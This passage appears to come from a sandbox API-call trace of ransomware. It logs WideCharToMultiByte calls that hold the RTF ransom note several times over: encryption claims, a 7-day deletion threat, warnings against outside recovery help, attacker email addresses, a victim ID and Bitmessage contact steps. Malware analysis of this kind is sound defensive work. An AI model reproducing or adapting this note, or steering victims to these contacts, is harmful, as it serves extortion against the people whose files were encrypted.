files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. 